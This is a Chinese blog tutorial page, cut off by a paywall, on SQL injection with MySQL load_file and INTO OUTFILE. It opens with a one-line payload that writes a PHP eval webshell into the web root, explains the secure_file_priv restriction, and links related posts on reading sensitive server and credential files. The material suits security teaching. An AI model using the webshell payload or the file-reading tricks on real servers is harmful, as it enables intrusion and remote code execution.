sql注入--高权限,load_file读写文件

最新推荐文章于 2022-03-05 22:41:32 发布
最新推荐文章于 2022-03-05 22:41:32 发布
阅读量2.5k 收藏 3
点赞数 1
文章标签: 数据库 操作系统 shell
原文链接:http://www.cnblogs.com/hackxf/p/8975501.html
版权 
select '<?php eval($_POST[123]) ?>' into outfile '/var/www/html/1.php';

1275435-20180704181028056-1021277395.png

1.MYSQL新特性限制文件写入及替代方法

高版本的MYSQL添加了一个新的特性secure_file_priv,该选项限制了mysql导出文件的权限
secure_file_priv选项

secure_file_priv 

  1、限制mysqld 不允许导入 | 导出
        --secure_file_prive=null

  2、限制mysqld 的导入 | 导出 只能发生在/tmp/目录下
      --secure_file_priv=/tmp/

  3、不对mysqld 的导入 | 导出做限制
              --secure_file_priv= 

linux
cat /etc/my.cnf
    [mysqld]
    secure_file_priv= 

win
    my.ini
       [mysqld]
     secure_file_priv=
查看secure_file_priv
show global variables like '%secure%';
最低0.47元/天 解锁文章
diecai2192
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
load_file()与into outfile函数详解
weixin_30457465的博客
07-23 2226
load_file()函数的使用: 1.使用条件 ①有读取文件权限 r and (select count(*) from mysql.user)>0 如果返回正常则说明有权限,反之没有 ②文件大小不能超过max_allowed_packet ③secure_file_priv的值不为NULL 查看mysql是否有对函数load_file(),outfile()函数的限制(securefi...
mysql数据库若使用load_file_在MySQL中如何使用LOAD_FILE()函数?(代码示例)
weixin_28718487的博客
01-19 1330
在MySQL中,LOAD_FILE()函数读取一个文件并将其内容作为字符串返回。语法LOAD_FILE(file_name)其中file_name是文件的完整路径。下面是我从一个文件中选择内容的示例:SELECT LOAD_FILE('/data/test.txt') AS Result;结果:+------------------------------------------+| Result...
mysql load file 权限_sql注入--权限load_file读写文件
weixin_36359110的博客
01-19 1533
select '' into outfile '/var/www/html/1.php';1.MYSQL新特性限制文件写入及替代方法版本的MYSQL添加了一个新的特性secure_file_priv,该选项限制了mysql导出文件权限secure_file_priv选项secure_file_priv1、限制mysqld 不允许导入 | 导出--secure_file_prive=null2、...
任意文件读取漏洞知识梳理
热门推荐
qq_40909772的博客
11-17 1万+
文章目录1.概述2.开发语言触发点2.1 PHP2.2 Python2.3 Java2.4 Ruby2.5 Node3.中间件/服务器相关触发点3.1 Nginx错误配置3.2 数据库3.3 软链接3.4 FFmpeg3.5 Docker-API4.文件读取的目标目录5.题目复现5.1 afr_15.2 afr_25.3 afr_3 1.概述   文件读取漏洞,就是攻击者通过一些手段可以读取服务器上开发者不允许读到的文件。主要读取的文件是服务器的各种配置文件文件形式存储的密钥、服务器信息(包括正在执行的进
mysql获取文件后缀名函数_MySQL使用LOAD_FILE()函数方法总结
weixin_34392511的博客
01-18 427
在MySQL中,LOAD_FILE()函数读取一个文件并将其内容作为字符串返回。语法LOAD_FILE(file_name)其中file_name是文件的完整路径。下面是我从一个文件中选择内容的示例:SELECT LOAD_FILE('/data/test.txt') AS Result;结果:+------------------------------------------+| Result...
Mysql注入中的outfile、dumpfileload_file函数详解
01-19
在利用sql注入漏洞后期,最常用的就是通过mysql的file系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个 into dumpfile() into outfile() load_file() 我们...
mysql-to-dbf.rar_Big!_DBF_php mysql dbf
09-23
同时,利用 MySQL 的批量操作特性,如 `LOAD DATA INFILE` 命令,可以大大提导入效率。 8. **错误处理和日志记录**:在处理大型数据转换时,确保有适当的错误处理机制是非常重要的。PHP 可以使用 try-catch 结构...
ocilib-3.9.3-gnu.tar.gz_ocilib
09-24
2. **LOB类型处理**:OCILIB提供了处理大对象(LOBs)的接口,包括BFILE、BLOB、CLOB、NCLOB和BINARY FILE。这些接口允许用户轻松地读取、写入和管理数据库中的大型数据,如图片、文档或音频文件。 3. **集合类型...
mysql Load Data InFile 的用法
09-11
需要注意的是,由于涉及到文件读写,确保文件路径的正确性以及权限设置,以防止导入或导出过程中出现错误。同时,为了提效率,通常会在导入前对表进行索引优化,但导入过程中可能需要暂时禁用这些索引,因为创建...
MySQL导出数据遇到secure-file-priv问题的解决方法
09-09
默认情况下,它可能被设置为一个特定的目录,比如`C:/ProgramData/MySQL/MySQL Server 5.7/Uploads`,只有在这个目录下,MySQL才允许执行`LOAD DATA INFILE`和`SELECT ... INTO OUTFILE`等涉及文件读写的操作。 ...
第四天sql load_file&报错注入简单用法
代码审计
03-05 2393
1. sql注入 使用的前提: a) 需要一个可控的参数点 b) 需要无过滤或者是过滤不充分 插入的payload数据库执行 分类: 按照注入的数据类型: a) 整数型 不需要闭合单双引号 b) 字符型 需要闭合单双引号 按照注入的方式: a) 联合查询注入 b) 报错注入 c) 基于bool的注入 d) 基于时间的注入 e) 堆叠注入 如何快速判断是否存在sql注入? 1.使用单双引号 看是否报错 2.使用四则运算 看是否是整数型 3. 使用bool判断 and 1=1
mysql load file 权限_Mysql 命令 load data infile 权限问题
weixin_35807050的博客
01-20 1049
【1】Mysql命令load data infile 执行权限问题工作中,经常会遇到往线上环境mysql数据库批量导入源数据的场景。针对这个场景问题,mysql有一个很效的命令:load data infile通过load data infile命令将data_file文件数据导入表中。当然,因为mysql数据库权限限制的问题,分为以下几种情况:(1)root用户(特指mysql的root,非L...
SQL注入一句话木马(load_file/out file
初学者L_言的博客
11-26 8625
工具 靶机——metasploitable2 环境——DVWA,(low等级下) 菜刀——蚁剑 权限查看 查看mysql是否有对函数load_file(),outfile()函数的限制 (securefilepriv的值是否为NULL) show global variables like '%secure%'; NULL 表示不可用, 空 表示可用 ' order by 2-- 查看字段...
MySQL注入load_file常用路径
weixin_34250709的博客
08-02 422
WINDOWS下: c:/boot.ini //查看系统版本 c:/windows/php.ini //php配置信息 c:/windows/my.ini //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码 c:/winnt/php.ini c:/winnt/my.ini c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库...
SQL注入-Mysql注入读写文件
qq_25899635的博客
05-22 7032
Mysql注入文件 mysql数据库在渗透测试过程中能够使用的功能还是比较多的,出了读取数据之外,还可以进行读写(但前提是权限足够)。 读文件前提: 1、用户权限足够,尽量具有root权限。 2、secure_file_priv不为NULL Mysql文件读写函数 举例:select load_file(’/etc/hosts’) 上面的例子是有条件限制的: 1、必须有权限读取并且文件必须完...
SQL注入16】SQL漏洞利用之读写文件
Fighting_hawk的博客
02-22 4335
1. 对文件进行读写既收到文件系统对用户权限的制约、也收到数据库设置的制约。 2. 掌握利用SQL漏洞进行文件读写的方法。 3. 后续需要进一步了解如何获取网站根目录路径的方法。
SQL注入篇——文件读写注入
爱国小白帽
02-10 4105
文件读写注入的原理 就是利用文件读写权限进行注入 文件读写注入的条件 1、读写文件需要secure_file_priv权限 secure_file_priv= 代表对文件读写没有限制 2.secure_file_priv=NULL 代表不能进行文件读写 secure_file_priv=d:/phpstudy/mysql/data 代表只能对该路径下文件进行读写 2、知道网站绝对路径 Wi...
SQL注入读写文件
WYJ____的博客
07-27 7040
SQL注入读写文件的根本条件: 1. 数据库允许导入导出(secure_file_priv) 2. 当前用户用户文件操作权限File_priv)   (select 1,2,%40%40global.secure_file_priv%23) %40为@ load_file()读文件 into outfile / into dumpfile文件 条件: 1.对web目录具有读...
If [“$sql_str”=”” -a -f $TXT_file -a -f $OK_file];then echo “连接数据库执行{$Sql_file}成功” exit 0 else echo “连接数据库执行{$Sql_file}成功” exit 1 fi 这个语句有哪里错了吗
最新发布
06-09
3. 在第四行和第六行中,输出的字符串中使用了大括号 `{}` 来包含变量 `$Sql_file`,但是这个变量名应该是 `$sql_str`,因为在这个语句中没有定义 `$Sql_file` 变量。 4. 在第四行和第六行中,输出的字符串中都是 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值